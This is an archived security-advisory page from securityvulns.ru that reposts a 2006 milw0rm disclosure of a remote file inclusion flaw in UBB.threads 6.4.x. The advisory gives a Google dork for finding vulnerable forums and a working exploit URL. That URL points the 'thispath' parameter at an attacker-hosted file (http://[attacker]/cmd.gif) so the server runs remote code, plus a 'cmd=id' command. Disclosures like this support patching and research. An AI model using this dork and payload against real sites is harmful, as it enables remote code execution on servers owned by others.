Computer Security

Security Advisory: UBB.threads >= 6.4.x Remote File Inclusion
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Docebo 3.0.3/DoceboCMS,
DoceboKms,DoceboLms,
DoceboCore,DoceboScs - Remote File Include Vulnerabilities

  phpCommunityCalendar 4.0.3 Multiple Vulnerabilites

  Prodder Remote Arbitrary Command Execution

  Perlpodder Remote Arbitrary Command Execution

From:MILW0RM <submit_(at)_milw0rm.com>
Date:23.05.2006
Subject:UBB.threads >= 6.4.x Remote File Inclusion

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion

founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.
gif?&cmd=id

contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server